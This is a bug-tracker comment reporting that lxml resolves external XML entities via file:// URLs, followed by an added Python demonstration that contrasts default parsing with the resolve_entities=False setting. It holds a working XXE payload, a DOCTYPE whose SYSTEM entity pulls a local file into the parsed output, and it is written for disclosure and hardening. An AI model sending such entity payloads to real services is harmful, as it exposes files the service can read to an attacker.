Comment 66 for bug 1100282

Christian Heimes (heimes) wrote : Re: DoS through XML entity expansion

Have you taken care of lxml, too? I just noticed that lxml always resolves and loads external entities with file:// URLs. An attacker can possibly load and retrieve all (XML) files that the service is allowed to access.

Example:

external_file.xml
==============
<!DOCTYPE external [
<!ENTITY ee SYSTEM "file:///PATH/TO/simple.xml">
]>
<root>&ee;</root>

simple.xml
=========
<!-- comment -->
<root>
   <element key='value'>text</element>
   <element>text</element>tail
   <empty-element/>
</root>

>>> from lxml import etree
>>> tree = etree.parse("external_file.xml")
>>> print(etree.tostring(tree))
<root><!-- comment -->
<root>
   <element key="value">text</element>
   <element>text</element>tail
   <empty-element/>
</root>
</root>
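The following is an added example, not part of Christian's comment or of lxml's own test suite. It reconstructs the two documents from the report in a temporary directory (so the file:// URL is built from a real path rather than the PATH/TO placeholder), parses the outer file once with lxml's default parser and once with `resolve_entities=False`, and returns both serialisations so the difference can be checked. The `write_samples`, `parse_with_defaults`, `parse_hardened` and `demo` names are this example's own.

```python
"""Added example: external-entity expansion in lxml and the parser
option that stops it.  Sample documents are constructed inline to
mirror the bug report; nothing here comes from the lxml project."""
import os
import tempfile

from lxml import etree

# Constructed copy of simple.xml from the report.
SIMPLE_XML = b"""<!-- comment -->
<root>
   <element key='value'>text</element>
   <element>text</element>tail
   <empty-element/>
</root>
"""


def write_samples(directory):
    """Write simple.xml and an external_file.xml whose DTD declares a
    SYSTEM entity pointing at it.  Returns the path of external_file.xml."""
    simple_path = os.path.join(directory, "simple.xml")
    with open(simple_path, "wb") as fh:
        fh.write(SIMPLE_XML)
    # "file://" + an absolute POSIX path yields the file:///... form used
    # in the report.
    external = (
        b"<!DOCTYPE external [\n"
        b'<!ENTITY ee SYSTEM "file://' + simple_path.encode() + b'">\n'
        b"]>\n"
        b"<root>&ee;</root>\n"
    )
    external_path = os.path.join(directory, "external_file.xml")
    with open(external_path, "wb") as fh:
        fh.write(external)
    return external_path


def parse_with_defaults(path):
    """lxml's default XMLParser has resolve_entities=True, so the SYSTEM
    entity is fetched from disk and its content inlined under <root>."""
    tree = etree.parse(path)
    # Serialise the root element only, so the DOCTYPE is not part of the
    # comparison.
    return etree.tostring(tree.getroot())


def parse_hardened(path):
    """Same document parsed with entity substitution switched off: the
    reference stays an unexpanded &ee; node and simple.xml's content never
    reaches the tree."""
    parser = etree.XMLParser(resolve_entities=False)
    tree = etree.parse(path, parser)
    return etree.tostring(tree.getroot())


def demo():
    """Return (default_output, hardened_output) for the constructed files."""
    with tempfile.TemporaryDirectory() as directory:
        path = write_samples(directory)
        return parse_with_defaults(path), parse_hardened(path)


if __name__ == "__main__":
    leaky, safe = demo()
    print("default parser :", leaky.decode())
    print("hardened parser:", safe.decode())
```

The hardened parser is the setting a service exposing an lxml parse to untrusted input wants; `resolve_entities=False` is an `XMLParser` keyword argument that lxml has accepted for a long time, and it applies to internal entities as well, so documents that rely on their own `<!ENTITY>` declarations for text substitution will also come back with references unexpanded.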